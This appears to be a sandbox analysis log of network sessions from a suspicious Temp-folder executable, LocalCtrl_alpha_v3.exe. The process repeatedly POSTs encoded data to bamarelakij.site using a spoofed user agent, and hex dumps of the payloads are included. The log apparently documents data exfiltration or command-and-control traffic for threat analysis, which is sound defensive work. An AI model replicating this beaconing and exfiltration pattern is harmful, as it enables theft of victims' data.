                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kciMWU2xX1T08vUKJbEP1L3ShMP8WbPlygzwjUoQGnxUpUPhna0tCQAf8K2GY6p5cOJL2Qoa4sHQVlkIsXfA2EeQm7MQ97Nr50bR5%2FqLKnqa5EYogVENR0%2FPUpDvFwIU6HXU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1583bdbf4326-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1574&rtt_var=609&sent=25&recv=65&lost=0&retrans=0&sent_bytes=2838&recv_bytes=60015&delivery_rate=1770770&cwnd=178&unsent_bytes=0&cid=21fadd9b11c03838&ts=579&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50116 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:29 UTC | 456 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 68882
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:30 UTC | 832 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2BXXiF5WiJLBfro2TUK5uNRyVAORujuhhAzXcMg68UmIoLdKPy93Il2jpOAmM%2BD4V3Y3Qinzjs%2F8UabHjSxRx0s6IIAuzJ5mVKuv%2BVIRSHX5X9c5XlAi5Z%2FFrJ8AoNmB0ueM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf158e894f4400-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10615&min_rtt=1824&rtt_var=6064&sent=27&recv=75&lost=0&retrans=0&sent_bytes=2839&recv_bytes=70150&delivery_rate=1600877&cwnd=156&unsent_bytes=0&cid=ce0f97c820c2e73a&ts=587&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50117 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:30 UTC | 453 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:30 UTC | 35 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
2025-01-06 22:18:31 UTC | 726 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xF%2Ff9jlRVOEhdAXnTt68%2Ff5ZWC5e1JZrMegSaQwhwzk7YYUa29lDU3g3QNuMFaHvPcsbrtYdrFPJYGltvSIlGgwV1wkcGfiEQPv%2B4jUQys1rrlVwUyl550qPNLy5R1J7dwwr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15961ec14346-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2055&rtt_var=799&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1124&delivery_rate=1346242&cwnd=252&unsent_bytes=0&cid=3cb1a675aae2c511&ts=312&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50118 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:42 UTC | 457 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 109611
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  Data Ascii: 9]:'jNAVCx]m;8O$c<N`Yd\+"uNthl45['}=I;aI'7,]kgs}jn[MaoIt4_33K&!bL&pk7;QIE*_'-7S6&B[ml?r7)Azo
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: 8d 73 dc b9 d2 a7 3c 7e 4a 35 7c 4d 8c a4 33 7d 8c 6b 1f f2 66 3e 38 f6 b9 fe 1c 48 ed f4 93 fe fa 10 76 9f cf 72 a7 4d f4 a3 6d c4 7c f9 93 e6 6a a1 f6 2a e9 18 bf 9d fa c3 52 f0 93 e2 ce b3 70 21 d4 48 b3 73 90 3e d2 b2 74 b8 af f3 7e 9e 30 a3 24 8e 19 9b 77 ba 6e cb c0 f5 23 6f 25 93 f1 ce 3e 2a 65 52 a1 cc 26 ff de e3 35 65 60 84 b6 a6 8e 57 36 94 4d 2d 02 de 93 75 d4 19 53 4f bd f3 ae ad db 4d 8c cb 57 09 19 7f f7 89 b1 07 00 78 d9 66 e2 8b 65 73 f6 89 bc e7 fd c9 e9 18 ce a7 0f be 84 ff 7f 87 00 00 00 14 0f 3c 7f 87 00 00 00 0a c7 25 5a ff e7 d3 62 7c 1a c8 04 00 00 00 40 97 10 f2 7b ef fc cd b2 19 9a 9a 9a c2 fd bf 00 00 00 50 3c 30 fe 83 00 00 00 45 83 6b bf 00 00 00 50 3c 30 fe 83 00 00 00 45 83 6b bf 00 00 00 50 3c 30 fe 83 00 00 00 45 83 6b bf
                                                                                                                                                                  Data Ascii: s<~J5|M3}kf>8HvrMm|j*Rp!Hs>t~0$wn#o%>*eR&5e`W6M-uSOMWxfes<%Zb|@{P<0EkP<0EkP<0Ek
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: 96 34 7f 64 e1 a3 34 e9 fc 7b d0 b8 81 1a 53 da 3b b1 07 6e 5d 6e 1c e4 da 90 69 3d 7d dc a3 73 b5 23 1f 8c ab b4 48 0c eb 3f c4 62 16 59 64 b0 e2 ed 03 cb 46 51 b1 a2 ec f7 1d 93 47 1e 96 65 cd df 33 f8 16 ff 8c be 7b 37 24 79 74 b5 98 6d 90 da 25 10 76 3e b8 a5 90 fb e2 73 d8 91 25 ee c3 ae da ae 2a 1f cf cf 19 be 7d b1 0f b3 41 a4 ff 49 b2 85 87 7f 50 d5 78 3f a9 fa 53 b8 65 5b 95 b1 69 52 01 e1 dd 27 5d f5 17 0f 76 bb 5b e6 42 99 9d 57 c3 df 85 2a fc fb db cf 3f ba ad 67 68 92 e2 d5 6d 4f d6 7d f6 71 c5 c4 1b c2 a1 85 23 02 b2 62 17 0e c8 2f 2f ca 4c ea 90 e7 b1 1f e3 96 d4 f9 aa 83 a0 6f 61 dd 93 81 46 7d ef 1f 1e 64 94 46 df f3 fc 4c 1a f1 4e cc 17 62 2e db b8 77 ed ab 95 27 f2 b7 5b e8 fb 3f 4f bb ff 17 df 58 ce 59 40 37 ed 38 76 e2 ad c9 72 79 ba
                                                                                                                                                                  Data Ascii: 4d4{S;n]ni=}s#H?bYdFQGe3{7$ytm%v>s%*}AIPx?Se[iR']v[BW*?ghmO}q#b//LoaF}dFLNb.w'[?OXY@78vry
                                                                                                                                                                  2025-01-06 22:18:42 UTC2294OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
2025-01-06 22:18:43 UTC | 731 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:43 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9s1WM4cRyvhpBVcmEKuh9RNfj60toEm3uHkR02QQPfRZV3FDQSuQOktP%2BfzzFDxaI5At1dRDXl62ahi6PVKQXMsL1wb50GxfAqdaHlj0TWqSh8yp0fNYEF%2FyqaHIBdvri4xF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15e2aa9042b7-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=16396&min_rtt=1617&rtt_var=9492&sent=54&recv=118&lost=0&retrans=0&sent_bytes=2838&recv_bytes=111012&delivery_rate=1805813&cwnd=212&unsent_bytes=0&cid=f1b49b8a50c84ee4&ts=539&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50119 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:44 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 745
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:44 UTC | 745 | OUT | Data Raw: [binary payload]
2025-01-06 22:18:44 UTC | 724 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:44 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=czuL73uj4P4urdSAKEGn5Jvr8dtD7ZiS86xLknCJtXYhKCG7ImVQ2SEyTdnVw%2FYZukHg9n3HwYp2mEzF2WvhNR1xfNWGmLxOCyTLIX7Cs3dbSjNmxnLTeuyiI3cOai8UW%2B3I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15eacc981a0f-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1837&min_rtt=1827&rtt_var=706&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1835&delivery_rate=1527995&cwnd=224&unsent_bytes=0&cid=60d14e74eae75c38&ts=331&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50120 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:45 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 212
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:45 UTC | 212 | OUT | Data Raw: [binary payload]
2025-01-06 22:18:45 UTC | 729 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:45 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsxCFDga5RY2Sk%2FYInr8N5BZckagdLnTdAlsazasINGcomDpjberheS7kkrAq5YEi8sLE8fEd%2BPB552%2FeLAmBSefGY%2BhC4waXNuP%2BuKuBVBYCHb4faTOEjJFLGVx7mHcGHPh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15f14bd64204-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=4228&rtt_var=2114&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1302&delivery_rate=48114&cwnd=234&unsent_bytes=0&cid=7cf51d3f4a38675c&ts=359&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50121 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:46 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 380
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:46 UTC | 380 | OUT | Data Raw: [binary payload]
2025-01-06 22:18:46 UTC | 728 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:46 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sslQw5len5olwlvBjtA8CjjEfQ68yl0KZGygtvDnlrlyvLyh5RfxOS5KejzEK0%2BWZ3m3NF7s7YuvVmL2WJPEnc%2F5PONB91iRIuAnjhPPCGpf%2FAuIxtSGc6Yfq5C9Zyo3bX%2F5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15f6ec51422d-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1593&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1470&delivery_rate=1514522&cwnd=232&unsent_bytes=0&cid=28188d17e05088ac&ts=252&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50122 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:48 UTC | 456 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 58769
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:48 UTC | 15331 | OUT | Data Raw: [binary payload]
2025-01-06 22:18:48 UTC | 15331 | OUT | Data Raw: [binary payload]
2025-01-06 22:18:48 UTC | 15331 | OUT | Data Raw: [binary payload]
2025-01-06 22:18:48 UTC | 12776 | OUT | Data Raw: [binary payload]
                                                                                                                                                                  2025-01-06 22:18:48 UTC | 731 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:48 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVDxB5VZVHqetpeKNDw5gB%2BNCE66cX8oHX25nK5RrwfkaC3A5TiW0phkoFJe2RL7JWSacbTUtLJZu7Hnajwua%2Btg4BLbzlj4UEKabIKuCcEO3dzK8%2Fa2LB%2FPUvhe6V983wK7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf16040dc2727b-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1796&rtt_var=692&sent=25&recv=66&lost=0&retrans=0&sent_bytes=2838&recv_bytes=60015&delivery_rate=1559829&cwnd=234&unsent_bytes=0&cid=22345bb82701df52&ts=620&x=0"


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  29 | 192.168.2.4 | 50123 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:50 UTC | 456 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 68839
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:51 UTC | 731 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:50 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4oDOeoF4gQj8z98TUZywzhdJ6Nao0zxmhtG26WcXAfzkYBVzsIH4FtfL8GJxUb8cnQDkXwcRZfLFTZLSLHABUHdU%2BW4OwQtIDNvR2tSCVUc0aRvwEC5wYeOh%2BxcO%2B9Gy6g%2Fb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf16121b950ca0-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=1633&rtt_var=924&sent=30&recv=75&lost=0&retrans=0&sent_bytes=2838&recv_bytes=70107&delivery_rate=1788120&cwnd=239&unsent_bytes=0&cid=21e1c55717bc4108&ts=490&x=0"


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  30 | 192.168.2.4 | 50124 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:51 UTC | 453 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:51 UTC35OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:18:52 UTC | 726 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:52 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkcSrZKgUtwKuQOsCsDnvHxVxXAwCIyVYANb21tv1S9prdeuPtqa644BepEsClvMlDwCeL6ejUZGzjRcboFO1%2BB9equ%2BZEyN0ZA6PTVWiW5FDIgGqE%2Ba5oQHJKisjzSFcoyE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf161a8f9e7cea-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7013&min_rtt=7013&rtt_var=3506&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1124&delivery_rate=117737&cwnd=226&unsent_bytes=0&cid=dc62606c183260c7&ts=362&x=0"


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  31 | 192.168.2.4 | 50126 | 23.44.136.141 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 442 | OUT | OPTIONS /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                  Host: bzib.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Origin: https://business.bing.com
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 332 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.8d872c17.1736201940.b264bf
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
